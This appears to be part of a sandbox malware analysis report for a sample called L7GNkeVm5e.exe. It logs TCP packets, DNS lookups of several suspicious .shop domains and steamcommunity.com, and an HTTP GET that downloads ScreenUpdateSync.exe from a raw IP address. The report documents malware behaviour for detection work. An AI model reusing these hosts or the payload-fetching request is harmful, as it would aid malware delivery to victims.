                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.224359035 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.224365950 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.224371910 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.224420071 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.224420071 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226130009 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226155043 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226166964 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226191044 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226211071 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226222992 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226234913 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226250887 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226250887 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226253986 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226267099 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226274014 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226285934 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226290941 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226290941 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226314068 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226331949 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226423025 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226445913 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226459026 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226468086 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226475000 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226489067 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226504087 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226504087 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.226542950 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273511887 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273570061 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273605108 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273622036 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273622036 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273638010 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273672104 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273680925 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273680925 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273706913 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273720980 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273741961 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273782969 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273787022 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273787022 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273817062 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273827076 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273850918 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273883104 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273885965 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273920059 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273930073 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273930073 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273958921 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273969889 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.273997068 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.274022102 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.274043083 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307496071 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307559967 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307614088 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307621956 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307641983 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307657003 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307703018 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307703018 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307712078 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307763100 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307806015 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307806015 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307817936 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307868958 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307872057 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307924032 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307966948 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307966948 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.307982922 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308013916 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308048010 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308056116 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308056116 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308101892 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308114052 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308173895 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308176994 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308249950 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308290958 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308290958 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308281898 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308346987 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308383942 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308413982 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308413982 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308415890 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308449984 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308465004 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308465004 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308482885 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308517933 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308547020 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308546066 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308547020 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308579922 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308592081 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308592081 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308614016 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308651924 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308651924 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308653116 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308662891 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308696032 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308715105 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308715105 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308728933 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308762074 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308777094 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308777094 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308794975 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308824062 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308840036 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308840036 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308856964 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308872938 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308891058 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308926105 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308959007 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.308991909 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309024096 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309056044 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309089899 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309122086 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309156895 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309190035 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309227943 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309238911 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309273958 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309305906 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309364080 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309397936 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309421062 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309432030 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309463978 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309477091 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309477091 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309498072 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309544086 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:03.309544086 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.803237915 CET49706443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.803288937 CET44349706104.102.49.254192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.803412914 CET49706443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.804560900 CET49706443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.804579020 CET44349706104.102.49.254192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:06.451900005 CET44349706104.102.49.254192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:06.451963902 CET49706443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:06.455061913 CET49706443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:06.455074072 CET44349706104.102.49.254192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:06.457171917 CET44349706104.102.49.254192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:06.503710985 CET49706443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:06.504731894 CET49706443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:06.547331095 CET44349706104.102.49.254192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:06.933916092 CET44349706104.102.49.254192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:06.933949947 CET44349706104.102.49.254192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:06.934057951 CET49706443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:06.934057951 CET49706443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:06.934092999 CET44349706104.102.49.254192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:06.934114933 CET44349706104.102.49.254192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:06.934123039 CET44349706104.102.49.254192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:06.934175014 CET49706443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:07.019375086 CET44349706104.102.49.254192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:07.019448996 CET49706443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:07.019476891 CET44349706104.102.49.254192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:07.019526958 CET49706443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:07.019948959 CET44349706104.102.49.254192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:07.019999981 CET49706443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:07.027679920 CET49706443192.168.2.5104.102.49.254
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:07.027697086 CET44349706104.102.49.254192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:08.105099916 CET8049705176.113.115.19192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:08.105276108 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:53:50.975492001 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:53:51.285543919 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:53:51.892370939 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:53:53.097629070 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:53:55.503846884 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:54:00.316342115 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:54:09.925749063 CET4970580192.168.2.5176.113.115.19
                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.004312038 CET6161353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.018717051 CET53616131.1.1.1192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.685065031 CET6316553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.696404934 CET53631651.1.1.1192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.700683117 CET6502853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.710176945 CET53650281.1.1.1192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.714240074 CET6120753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.723428965 CET53612071.1.1.1192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.725641966 CET6543753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.734882116 CET53654371.1.1.1192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.736407995 CET5514453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.745599031 CET53551441.1.1.1192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.746938944 CET5997253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.753963947 CET53599721.1.1.1192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.755306959 CET5206653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.764034986 CET53520661.1.1.1192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.766500950 CET5795453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.775381088 CET53579541.1.1.1192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.777220964 CET5576353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.784648895 CET53557631.1.1.1192.168.2.5
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.790389061 CET5657153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.797118902 CET53565711.1.1.1192.168.2.5
                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.004312038 CET192.168.2.51.1.1.10x9c1cStandard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.685065031 CET192.168.2.51.1.1.10x5fbfStandard query (0)skidjazzyric.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.700683117 CET192.168.2.51.1.1.10x5e9aStandard query (0)soundtappysk.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.714240074 CET192.168.2.51.1.1.10xe161Standard query (0)femalsabler.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.725641966 CET192.168.2.51.1.1.10x820aStandard query (0)apporholis.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.736407995 CET192.168.2.51.1.1.10xc6fbStandard query (0)crowdwarek.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.746938944 CET192.168.2.51.1.1.10xbab5Standard query (0)versersleep.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.755306959 CET192.168.2.51.1.1.10xc94eStandard query (0)chipdonkeruz.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.766500950 CET192.168.2.51.1.1.10xfbcdStandard query (0)handscreamny.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.777220964 CET192.168.2.51.1.1.10x32e8Standard query (0)robinsharez.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.790389061 CET192.168.2.51.1.1.10x2284Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.018717051 CET1.1.1.1192.168.2.50x9c1cNo error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:01.018717051 CET1.1.1.1192.168.2.50x9c1cNo error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.696404934 CET1.1.1.1192.168.2.50x5fbfName error (3)skidjazzyric.clicknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.710176945 CET1.1.1.1192.168.2.50x5e9aName error (3)soundtappysk.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.723428965 CET1.1.1.1192.168.2.50xe161Name error (3)femalsabler.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.734882116 CET1.1.1.1192.168.2.50x820aName error (3)apporholis.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.745599031 CET1.1.1.1192.168.2.50xc6fbName error (3)crowdwarek.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.753963947 CET1.1.1.1192.168.2.50xbab5Name error (3)versersleep.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.764034986 CET1.1.1.1192.168.2.50xc94eName error (3)chipdonkeruz.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.775381088 CET1.1.1.1192.168.2.50xfbcdName error (3)handscreamny.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.784648895 CET1.1.1.1192.168.2.50x32e8Name error (3)robinsharez.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:05.797118902 CET1.1.1.1192.168.2.50x2284No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                • post-to-me.com
                                                                                                                                                                                                                                                • steamcommunity.com
                                                                                                                                                                                                                                                • 176.113.115.19
                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                0192.168.2.549705176.113.115.1980768C:\Users\user\Desktop\L7GNkeVm5e.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.059999943 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                                                                                                                                                                                                User-Agent: ShareScreen
                                                                                                                                                                                                                                                Host: 176.113.115.19
                                                                                                                                                                                                                                                Jan 12, 2025 17:52:02.739356995 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Sun, 12 Jan 2025 16:52:02 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Last-Modified: Sun, 12 Jan 2025 16:45:01 GMT
                                                                                                                                                                                                                                                ETag: "62a00-62b850c908464"
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Content-Length: 403968
                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
